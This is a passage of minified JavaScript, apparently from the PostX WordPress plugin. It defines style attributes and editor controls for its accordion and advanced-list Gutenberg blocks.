}"}]},triIconSize:{type:"object",default:{lg:"21",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { width:{{triIconSize}}; height:{{triIconSize}}; }"}]},titleTriggerIconGap:{type:"object",default:{lg:"24",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation { gap:{{titleTriggerIconGap}}; }"}]},triIconColor:{type:"string",default:"#070707",style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { color:{{triIconColor}}; }"}]},triIconBg:{type:"object",default:{openColor:0,type:"color",color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg"}]},triIconBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg"}]},triIconRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { border-radius: {{triIconRadius}}; }"}]},triIconHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg:hover { color: {{triIconHoverColor}}; }"}]},triIconHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-item__control svg"}]},triIconHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg:hover { gap:{{titleIconGap}}; }"}]},triIconHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg:hover { gap:{{triIconHoverRadius}}; }"}]},triIconActiveColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg { color:{{triIconActiveColor}}; }"}]},triIconActiveBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg"}]},triIconActiveBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg"}]},triIconActiveRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg { border-radius:{{triIconActiveRadius}}; }"}]},triIconPadding:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { padding:{{triIconPadding}}; }"}]},barWrapGap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-accordion-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout,\n            .postx-page {{ULTP}} > .ultp-accordion-wrapper { gap:{{barWrapGap}}; }"}]},barWrapBg:{type:"object",default:{openColor:1,type:"color",color:"#E9E9E9"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation"}]},barWrapBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#DEDEDE",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation"}]},barWrapRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation { border-radius:{{barWrapRadius}}; }"}]},barWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation"}]},barWrapHoverBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover"}]},barWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover"}]},barWrapHoverRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover { border-radius: {{barWrapHoverRadius}}; }"}]},barWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover"}]},barWrapActiveBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation"}]},barWrapActiveBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation"}]},barWrapActiveRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation { border-radius:{{barWrapActiveRadius}} }"}]},barWrapActiveShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation"}]},barWrapperPadding:{type:"object",default:{lg:{top:20,bottom:20,left:32,right:32,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation { padding:{{barWrapperPadding}}; }"}]},contentBarGap:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item { gap:{{contentBarGap}}; }"}]},contentBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__content"}]},contentRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__content-inside { border-radius: {{contentRadius}}; }"}]},contentPadding:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:".postx-page {{ULTP}} .ultp-accordion-item__content-inside, \n            .block-editor-block-list__layout {{ULTP}} .ultp-accordion-item__content.active .ultp-accordion-item__content-inside { padding: {{contentPadding}}; }"}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__content-inside"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},92038:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(87668),n=l(70124),r=l(76931),s=l(10981);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/accordion-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/accordion.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Create collapsible content sections","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/accordion.svg"}},edit:i.Z,save:n.Z})},43166:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(63599);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,useBlockProps:c}=wp.blockEditor,{useState:u,useEffect:d,useRef:m,Fragment:g}=wp.element,{getBlockAttributes:y,getBlockRootClientId:b}=wp.data.select("core/block-editor");function v(e){const t=m(null),[l,v]=u("Content"),{setAttributes:h,name:f,isSelected:k,className:w,attributes:x,clientId:T,attributes:{previewImg:_,blockId:C,advanceId:E,layout:S,listGroupIconType:P,listCustomIcon:L,listGroupCustomImg:I,listDisableText:B,listGroupSubtextEnable:U,listGroupBelowIcon:M,enableIcon:A,listLayout:H,currentPostId:N}}=e;d((()=>{const e=T.substr(0,6),t=y(b(T));(0,a.qi)(h,t,N,T),C?C&&C!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[T]),d((()=>{const e=t.current;var l;e?((l=e).listGroupIconType!=P||l.listCustomIcon!=L||l.listGroupBelowIcon!=M||l.listGroupCustomImg!=I||l.listDisableText!=B||l.listGroupSubtextEnable!=U||l.enableIcon!=A||l.listLayout!=H||l.layout!=S)&&((0,a.Gu)(T),t.current=x):t.current=x}),[x]);const j={setAttributes:h,name:f,attributes:x,setSection:v,section:l,clientId:T};let Z;if(C&&(Z=(0,i.Kh)(x,"ultimate-post/advanced-list",C,(0,a.k0)())),_&&!k)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:_});d((()=>{k&&_&&h({previewImg:""})}),[e?.isSelected]);const O=c({...E&&{id:E},className:`ultp-block-${C} ${w}`});return(0,o.createElement)(g,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Z,{store:j})),(0,o.createElement)(n.Z,{include:[{type:"template"},{type:"layout",block:"advance-list",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/list/list1.svg",label:"Layout 1",value:"layout1"},{img:"assets/img/layouts/list/list2.svg",label:"Layout 2",value:"layout2"},{img:"assets/img/layouts/list/list3.svg",label:"Layout 3",value:"layout3"}]}],store:j}),(0,o.createElement)("div",O,Z&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Z}}),(0,o.createElement)("ul",{className:`ultp-list-wrapper ultp-list-${S}`},(0,o.createElement)(p,{template:[["ultimate-post/list",{listText:"List Item"}],["ultimate-post/list",{listText:"List Item"}],["ultimate-post/list",{listText:"List Item"}]],allowedBlocks:["ultimate-post/list"]}))))}},36988:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294);const{Component:a}=wp.element,{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,layout:a}=e.attributes,r=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",r,(0,o.createElement)("ul",{className:`ultp-list-wrapper ultp-list-${a}`},(0,o.createElement)(i.Content,null)))}},63599:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid7994",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",block:"advance-list",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/list/list1.svg",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/list/list2.svg",label:"Layout 2",value:"layout2",pro:!1},{img:"assets/img/layouts/list/list3.svg",label:"Layout 3",value:"layout3",pro:!1}]}},{position:2,data:{type:"toggle",key:"listInline",label:__("Inline View","ultimate-post")}},{position:3,data:{type:"alignment",block:"advance-list",key:"listAlignment",disableJustify:!0,label:__("Vertical Alignment (Align Items)","ultimate-post")}},{position:4,data:{type:"range",key:"listSpaceBetween",min:0,max:300,step:1,responsive:!0,label:__("Space Between Items","ultimate-post")}},{position:5,data:{type:"range",key:"listSpaceIconText",min:0,max:300,step:1,responsive:!0,label:__("Spacing Between Icon & Texts","ultimate-post")}},{position:6,data:{type:"group",key:"listPosition",justify:!0,label:__("Icon Position","ultimate-post"),options:[{value:"start",label:__("Top","ultimate-post")},{value:"center",label:__("Center","ultimate-post")},{value:"end",label:__("Bottom","ultimate-post")}]}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("List Icon/Image","ultimate-post"),depend:"enableIcon",include:[{position:1,data:{type:"tag",key:"listGroupIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"image",label:__("Image","ultimate-post")},{value:"default",label:__("Default","ultimate-post")},{value:"",label:__("None","ultimate-post")}]}},{position:2,data:{type:"select",key:"listLayout",label:__("List Style","ultimate-post"),options:[{label:__("Select","ultimate-post"),value:""},{label:__("By Abc","ultimate-post"),value:"abc"},{label:__("By Roman Number","ultimate-post"),value:"roman"},{label:__("By 123","ultimate-post"),value:"number"},{label:__("By Bullet","ultimate-post"),value:"bullet"}]}},{position:3,data:{type:"icon",key:"listCustomIcon",label:__("Icon Store","ultimate-post")}},{position:4,data:{type:"media",key:"listGroupCustomImg",label:__("Upload Custom Image","ultimate-post")}},{position:5,data:{type:"dimension",key:"listImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{position:6,data:{type:"typography",key:"listIconTypo",label:__("Typography","ultimate-post")}},{position:7,data:{type:"range",key:"listGroupIconSize",label:__("Icon/Image Size","ultimate-post")}},{position:8,data:{type:"range",key:"listGroupBgSize",label:__("Background Size","ultimate-post"),help:"Icon Background Color Required"}},{position:9,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"listGroupIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"listGroupIconbg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listGroupIconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"listGroupHoverIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"listGroupHoverIconbg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listGroupHoverIconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupHoverIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"listDisableText",label:__("Disable Text","ultimate-post")}},{position:2,data:{type:"typography",key:"listTextTypo",label:__("Title Typography","ultimate-post")}},{position:3,data:{type:"color",key:"listGroupTitleColor",label:__("Title Color","ultimate-post")}},{position:4,data:{type:"color",key:"listGroupTitleHoverColor",label:__("Title Hover Color","ultimate-post")}},{position:5,data:{type:"toggle",key:"listGroupSubtextEnable",label:__("Enable Subtext","ultimate-post")}},{position:6,data:{type:"typography",key:"listGroupSubtextTypo",label:__("Subtext Typography","ultimate-post")}},{position:7,data:{type:"range",key:"listGroupSubtextSpace",unit:!0,responsive:!0,label:__("Space Between  Text & Subtext","ultimate-post")}},{position:8,data:{type:"color",key:"listGroupSubtextColor",label:__("Subtext Color","ultimate-post")}},{position:9,data:{type:"color",key:"listGroupSubtextHoverColor",label:__("Subtext Hover Color","ultimate-post")}},{position:10,data:{type:"toggle",key:"listGroupBelowIcon",help:"Layout One/Two Required ",label:__("Midpoint Subtext","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content Wrap","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"listGroupPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"listGroupBg",label:__("Background Color","ultimate-post")},{type:"border",key:"listGroupborder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"listGroupHoverBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listGroupHovborder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupHovRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Separator","ultimate-post"),depend:"enableSeparator",include:[{position:1,data:{type:"color",key:"listGroupSepColor",label:__("Border Color","ultimate-post")}},{position:2,data:{type:"range",key:"listGroupSepSize",min:0,max:30,label:__("Separator Size","ultimate-post")}},{position:3,data:{type:"select",key:"listGroupSepStyle",options:[{value:"none",label:__("None","ultimate-post")},{value:"dotted",label:__("Dotted","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")},{value:"dashed",label:__("Dashed","ultimate-post")},{value:"groove",label:__("Groove","ultimate-post")}],label:__("Border Style","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())},65839:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1",style:[{depends:[{key:"layout",condition:"==",value:"layout1"}]},{depends:[{key:"layout",condition:"==",value:"layout2"}]},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} li .ultp-list-content { display: block !important; }"},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}]}]},listLayout:{type:"string",default:"number",style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}  ul,\n                {{ULTP}}  ul li { list-style-type: none; }"},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"listLayout",condition:"==",value:"roman"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: roman-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: roman-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon:before { content: counter(roman-counter, upper-roman) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"listLayout",condition:"==",value:"number"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: number-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: number-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon:before { content: counter(number-counter) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box; }'},{depends:[{key:"listLayout",condition:"==",value:"abc"},{key:"listGroupIconType",condition:"==",value:"default"},{key:"listGroupBelowIcon",condition:"==",value:!1}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon:before { content: counter(alpha-counter, lower-alpha) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"},{key:"listGroupBelowIcon",condition:"==",value:!1}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative;  }\n                {{ULTP}} .ultp-list-texticon { line-height: 0px; }\n                {{ULTP}} .ultp-list-texticon:before {   content: ""; display: inline-block; width: 10px; height: 10px; border-radius: 50%; background-color: black; transition: .3s; box-sizing: border-box; }'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"roman"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: roman-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: roman-counter; }\n                {{ULTP}} .ultp-list-texticon:before { content: counter(roman-counter, upper-roman) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"number"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: number-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: number-counter; }\n                {{ULTP}} .ultp-list-texticon:before { content: counter(number-counter) "."; display: flex; align-items: center;  justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"abc"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center;  position: relative; counter-increment: alpha-counter; }\n                {{ULTP}} .ultp-list-texticon:before { content: counter(alpha-counter, lower-alpha) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box; }'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: alpha-counter; }\n                {{ULTP}} .ultp-list-texticon { line-height: 0px; }\n                {{ULTP}} .ultp-list-texticon:before {   content: ""; display: inline-block; width: 10px; height: 10px; border-radius: 50%; background-color: black; transition: .3s; box-sizing: border-box; }'}]},listInline:{type:"boolean",default:!1,style:[{depends:[{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: flex;}\n            {{ULTP}} .ultp-list-wrapper > li:last-child { padding-right: 0px; margin-right: 0px; }\n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list { width: auto !important; }"},{depends:[{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: block;} \n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list { width: 100%; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: flex;}\n            {{ULTP}} .block-editor-block-list__layout>div:last-child li{ padding-right: 0px; margin-right: 0px;} \n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list { width: auto !important; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: block;} \n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list{ width: 100%; }"}]},listAlignment:{type:"string",default:"left",style:[{depends:[{key:"listAlignment",condition:"==",value:"left"},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; flex-direction: column; align-items: flex-start;}"},{depends:[{key:"listAlignment",condition:"==",value:"right"},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left: auto; display: flex; flex-direction: column; align-items: flex-end;}"},{depends:[{key:"listInline",condition:"==",value:!1},{key:"listAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-direction: column; align-items: center;}"},{depends:[{key:"listInline",condition:"==",value:!0},{key:"listAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-wrap: wrap; justify-content: center;}\n                {{ULTP}} .ultp-list-wrapper .ultp-list-content { justify-content: center; }"},{depends:[{key:"listAlignment",condition:"==",value:"left"},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; justify-content: flex-start; flex-wrap: wrap;}"},{depends:[{key:"listAlignment",condition:"==",value:"right"},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left:  auto; display: flex; justify-content: flex-end; flex-wrap: wrap;}"}]},listSpaceBetween:{type:"object",default:{lg:"17",unit:"px"},style:[{depends:[{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-list { margin-right:calc({{listSpaceBetween}}/ 2); padding-right:calc({{listSpaceBetween}}/ 2);}\n                {{ULTP}} .wp-block-ultimate-post-list{ margin-top: 0px !important; margin-bottom: 0px !important;}"},{depends:[{key:"listInline",condition:"==",value:!0},{key:"enableSeparator",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { gap:{{listSpaceBetween}}; }\n                {{ULTP}} .wp-block-ultimate-post-list{ margin: 0px !important; }"},{depends:[{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .wp-block-ultimate-post-list { margin-bottom: calc({{listSpaceBetween}}/ 2); padding-bottom:calc({{listSpaceBetween}}/ 2);}"}]},listSpaceIconText:{type:"object",default:{lg:"12",ulg:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupBelowIcon",condition:"==",value:!1}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { column-gap:{{listSpaceIconText}}; }"},{depends:[{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupBelowIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-heading { column-gap:{{listSpaceIconText}}; }"},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg,\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { margin-bottom:{{listSpaceIconText}}; }"}]},enableIcon:{type:"boolean",default:!0},listPosition:{type:"string",default:"center",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { align-items:{{listPosition}}; }"}]},listGroupIconType:{type:"string",default:"icon",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}]}]},listCustomIcon:{type:"string",default:"right_circle_line",style:[{depends:[{key:"listGroupIconType",condition:"==",value:"icon"}]}]},listGroupCustomImg:{type:"object",default:"",style:[{depends:[{key:"enableIcon",condition:"==",value:!0},{key:"listGroupIconType",condition:"==",value:"image"}]}]},listImgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"image"}],selector:"{{ULTP}} .wp-block-ultimate-post-list img { border-radius: {{listImgRadius}}; }"}]},listGroupIconSize:{type:"string",default:"16",style:[{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list svg,\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg img { height:{{listGroupIconSize}}px; width:{{listGroupIconSize}}px; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"}],selector:"{{ULTP}} .ultp-list-texticon:before { height:{{listGroupIconSize}}px; width:{{listGroupIconSize}}px; 